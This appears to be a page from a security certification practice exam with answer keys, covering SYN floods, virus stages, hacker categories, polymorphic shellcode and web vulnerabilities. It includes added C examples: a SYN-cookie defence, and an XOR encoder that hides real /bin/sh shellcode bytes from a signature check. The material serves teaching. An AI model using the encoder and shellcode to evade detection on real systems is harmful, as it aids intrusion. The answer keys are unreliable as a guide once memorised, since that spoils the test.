Topic 1: Volume A
A SYN flood attack sends TCP connection requests faster than a machine can process
them.
The attacker creates a random (spoofed) source address for each packet.
The SYN flag set in each packet is a request to open a new connection to the server
from the spoofed IP address.
The victim responds to the spoofed IP address with a SYN-ACK, then waits for a confirmation
(the client's ACK) that never arrives; the timeout wait is about 3 minutes.
The victim's connection table fills up with half-open connections waiting for replies, and
new connections are ignored.
Legitimate users are therefore ignored and will not be able to access the server.
How do you protect your network against SYN Flood attacks?
A.
SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully
constructed sequence number generated as a hash of the client's IP address, port number
and other information. When the client responds with a normal ACK, that special sequence
number will be included, which the server then verifies. Thus, the server first allocates
memory on the third packet of the handshake, not the first.
B.
RST cookies. The server sends a wrong SYN/ACK back to the client. The client should
then generate an RST packet telling the server that something is wrong. At this point, the
server knows the client is valid and will now accept incoming connections from that client
normally.
C.
Check the incoming packet's IP address against a spam database on the Internet and
enable the filter using ACLs at the firewall.
D.
Stack tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN
floods, for example by reducing the timeout before the stack frees the memory allocated for
a half-open connection.
E.
Micro blocks. Instead of allocating a complete connection record, allocate a micro record
of 16 bytes for the incoming SYN.
SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully
constructed sequence number generated as a hash of the client's IP address, port number
and other information. When the client responds with a normal ACK, that special sequence
number will be included, which the server then verifies. Thus, the server first allocates
memory on the third packet of the handshake, not the first.
RST cookies. The server sends a wrong SYN/ACK back to the client. The client should
then generate an RST packet telling the server that something is wrong. At this point, the
server knows the client is valid and will now accept incoming connections from that client
normally.
Stack tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN
floods, for example by reducing the timeout before the stack frees the memory allocated for
a half-open connection.
Micro blocks. Instead of allocating a complete connection record, allocate a micro record
of 16 bytes for the incoming SYN.
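The SYN-cookie mechanism from option A, worked through as an added example (this is not code from the page or from any real TCP stack). The cookie layout (5-bit time counter in the top bits, 27-bit keyed hash below), the FNV-1a mixing function, the 2-tick freshness window and all names are assumptions chosen for illustration; a production implementation uses a keyed cryptographic hash (Linux uses SipHash) and also encodes the client's MSS in the low bits.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simplified SYN-cookie generator and verifier (added example, not from the page).
 * Hypothetical layout of the 32-bit server ISN used as the cookie:
 *   bits 31..27  5-bit time counter t (e.g. minutes since boot, mod 32)
 *   bits 26..0   27-bit keyed hash of (saddr, daddr, sport, dport, client ISN, t)
 * Nothing is stored on SYN; everything needed to verify the ACK is in the ACK. */

#define COOKIE_MAX_AGE 2   /* accept cookies at most this many counter ticks old */

struct tcp4_tuple {
    uint32_t saddr, daddr;   /* client and server IPv4 addresses */
    uint16_t sport, dport;   /* client and server ports */
};

/* FNV-1a over the tuple, client ISN and counter, keyed with a server secret.
 * Stand-in for a real keyed hash; adequate only to show the mechanism. */
static uint32_t cookie_hash(const struct tcp4_tuple *tp, uint32_t client_isn,
                            uint32_t t, uint64_t secret)
{
    uint8_t buf[20];
    uint64_t h = 0xcbf29ce484222325ULL ^ secret;
    memcpy(buf,      &tp->saddr, 4);
    memcpy(buf + 4,  &tp->daddr, 4);
    memcpy(buf + 8,  &tp->sport, 2);
    memcpy(buf + 10, &tp->dport, 2);
    memcpy(buf + 12, &client_isn, 4);
    memcpy(buf + 16, &t, 4);
    for (size_t i = 0; i < sizeof buf; i++) {
        h ^= buf[i];
        h *= 0x100000001b3ULL;
    }
    return (uint32_t)(h ^ (h >> 32));
}

/* Called on SYN: returns the ISN to place in the SYN-ACK. No state is kept. */
uint32_t syn_cookie_make(const struct tcp4_tuple *tp, uint32_t client_isn,
                         uint32_t now, uint64_t secret)
{
    uint32_t t = now & 0x1f;
    uint32_t h = cookie_hash(tp, client_isn, t, secret) & 0x07ffffff;
    return (t << 27) | h;
}

/* Called on a bare ACK for which no half-open entry exists. seq is the ACK's
 * sequence number (client ISN + 1), ack its acknowledgement number (cookie + 1).
 * Returns 1 if the cookie is genuine and fresh (allocate the connection now),
 * else 0 (drop silently). */
int syn_cookie_check(const struct tcp4_tuple *tp, uint32_t seq, uint32_t ack,
                     uint32_t now, uint64_t secret)
{
    uint32_t cookie = ack - 1;
    uint32_t client_isn = seq - 1;
    uint32_t t = cookie >> 27;
    uint32_t age = (now - t) & 0x1f;            /* counter arithmetic mod 32 */
    if (age > COOKIE_MAX_AGE)
        return 0;                               /* stale or replayed cookie */
    uint32_t expect = cookie_hash(tp, client_isn, t, secret) & 0x07ffffff;
    return (cookie & 0x07ffffff) == expect;
}

int main(void)
{
    /* constructed sample: client 192.168.1.2:51234 -> server 10.0.0.1:443 */
    struct tcp4_tuple tp = { 0xc0a80102u, 0x0a000001u, 51234, 443 };
    uint64_t secret = 0x5eed5eed5eed5eedULL;    /* per-boot random in a real stack */
    uint32_t client_isn = 0x12345678u;
    uint32_t cookie = syn_cookie_make(&tp, client_isn, 100, secret);
    printf("SYN-ACK seq (cookie) = 0x%08x\n", cookie);
    printf("genuine ACK: %d\n", syn_cookie_check(&tp, client_isn + 1, cookie + 1, 100, secret));
    printf("stale ACK:   %d\n", syn_cookie_check(&tp, client_isn + 1, cookie + 1, 103, secret));
    printf("forged ACK:  %d\n", syn_cookie_check(&tp, client_isn + 1, (cookie ^ 1) + 1, 100, secret));
    return 0;
}
```

The point to notice is that the server allocates nothing between the SYN and the ACK, so a flood of spoofed SYNs costs it only a hash per packet; the price is that TCP options negotiated in the SYN (window scaling, SACK) are lost unless the cookie encodes them, which is why stacks usually enable cookies only once the backlog overflows.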
In what stage of the virus life cycle does a stealth virus get activated by the user performing
certain actions, such as running an infected program?
A.
Design
B.
Elimination
C.
Incorporation
D.
Replication
E.
Launch
F.
Detection
Launch
Ursula is a college student at a University in Amsterdam. Ursula originally went to college
to study engineering but later changed to marine biology after spending a month at sea
with her friends. These friends frequently go out to sea to follow and harass fishing fleets
that illegally fish in foreign waters. Ursula eventually wants to put companies practicing
illegal fishing out of business. Ursula decides to hack into the parent company's computers
and destroy critical data, knowing full well that, if caught, she probably would be sent to jail
for a very long time. What would Ursula be considered?
A.
Ursula would be considered a gray hat since she is performing an act against illegal
activities.
B.
She would be considered a suicide hacker.
C.
She would be called a cracker.
D.
Ursula would be considered a black hat.
She would be considered a suicide hacker.
More sophisticated IDSs look for common shellcode signatures, but even these systems
can be bypassed by using polymorphic shellcode. This is a technique common among
virus writers; it basically hides the true nature of the shellcode in different disguises.
How does a polymorphic shellcode work?
A.
They encrypt the shellcode by XORing values over the shellcode, using loader code to
decrypt the shellcode, and then executing the decrypted shellcode
B.
They convert the shellcode into Unicode, using a loader to convert it back to machine code
and then executing it
C.
They reverse the working instructions into opposite order by masking the IDS signatures
D.
They compress shellcode into normal instructions, uncompress the shellcode using
loader code and then executing the shellcode
They encrypt the shellcode by XORing values over the shellcode, using loader code to
decrypt the shellcode, and then executing the decrypted shellcode
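The XOR scheme in the correct answer, shown as an added example rather than code from the page: a payload is XOR-encoded with a per-instance key, a naive signature matcher no longer finds the known byte pattern in the encoded form, and a decoder (the job of the loader stub) restores the original bytes at run time. The payload is the well-known 23-byte Linux/x86 execve("/bin/sh") sequence used purely as sample data and never executed; the signature, key choices, wire format (key byte followed by encoded bytes) and function names are assumptions for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the page: XOR encoding of a payload and the decode
 * step a loader stub performs. Payload bytes are data only and never executed. */

/* Well-known 23-byte Linux/x86 execve("/bin/sh") sequence, used as sample data. */
static const uint8_t SHELLCODE[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80
};
#define SHELLCODE_LEN (sizeof SHELLCODE)

/* A signature an IDS might carry: "mov al, 11; int 0x80" (execve syscall). */
static const uint8_t SIG_EXECVE[] = { 0xb0, 0x0b, 0xcd, 0x80 };
#define SIG_EXECVE_LEN (sizeof SIG_EXECVE)

/* Naive signature matcher: 1 if sig occurs anywhere in buf, else 0. */
int contains_sig(const uint8_t *buf, size_t n, const uint8_t *sig, size_t m)
{
    if (m == 0 || n < m) return 0;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(buf + i, sig, m) == 0) return 1;
    return 0;
}

/* Encoder side: out = [key][payload ^ key ...]. Returns bytes written, or 0 if
 * the key is unusable: a zero key leaves the payload unchanged, and a payload
 * byte equal to the key would encode to a NUL, which many injection vectors
 * (string copies) cannot carry. */
size_t xor_encode(const uint8_t *payload, size_t n, uint8_t key, uint8_t *out)
{
    if (key == 0) return 0;
    for (size_t i = 0; i < n; i++)
        if (payload[i] == key) return 0;
    out[0] = key;                    /* the decoder stub needs the key too */
    for (size_t i = 0; i < n; i++)
        out[1 + i] = payload[i] ^ key;
    return n + 1;
}

/* Decoder side: what the loader stub does at run time just before jumping to
 * the recovered bytes. Returns the payload length. */
size_t xor_decode(const uint8_t *pkt, size_t len, uint8_t *out)
{
    if (len < 2) return 0;
    uint8_t key = pkt[0];
    for (size_t i = 1; i < len; i++)
        out[i - 1] = pkt[i] ^ key;
    return len - 1;
}

int main(void)
{
    uint8_t wire[SHELLCODE_LEN + 1], recovered[SHELLCODE_LEN];
    printf("plain payload matches execve signature: %d\n",
           contains_sig(SHELLCODE, SHELLCODE_LEN, SIG_EXECVE, SIG_EXECVE_LEN));
    size_t n = xor_encode(SHELLCODE, SHELLCODE_LEN, 0xaa, wire);
    printf("encoded payload matches signature:      %d\n",
           contains_sig(wire, n, SIG_EXECVE, SIG_EXECVE_LEN));
    size_t m = xor_decode(wire, n, recovered);
    printf("decoder restores original bytes:        %d\n",
           m == SHELLCODE_LEN && memcmp(recovered, SHELLCODE, m) == 0);
    return 0;
}
```

Choosing a fresh key per instance is what makes every copy of the same payload look different on the wire. The decoder stub itself is the remaining constant, so a signature on the stub still catches this simple form; genuine polymorphic engines also vary the stub (different registers, instruction orderings, junk instructions), which is the point the question's wording about "different disguises" is getting at.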
Bret is a web application administrator and has just read that there are a number of
surprisingly common web application vulnerabilities that can be exploited by
unsophisticated attackers with easily available tools on the Internet. He has also read that
when an organization deploys a web application, they invite the world to send HTTP
requests. Attacks buried in these requests sail past firewalls, filters, platform hardening,
SSL, and IDS without notice because they are inside legal HTTP requests. Bret is
determined to weed out vulnerabilities.
What are some of the common vulnerabilities in web applications that he should be
concerned about?
A.
Non-validated parameters, broken access control, broken account and session
management, cross-site scripting and buffer overflows are just a few common
vulnerabilities
B.
Visible clear text passwords, anonymous user account set as default, missing latest
security patch, no firewall filters set and no SSL configured are just a few common
vulnerabilities
C.
No SSL configured, anonymous user account set as default, missing latest security
patch, no firewall filters set and an inattentive system administrator are just a few common
vulnerabilities
D.
No IDS configured, anonymous user account set as default, missing latest security
patch, no firewall filters set and visible clear text passwords are just a few common
vulnerabilities
Non-validated parameters, broken access control, broken account and session
management, cross-site scripting and buffer overflows are just a few common
vulnerabilities
Page 7 of 175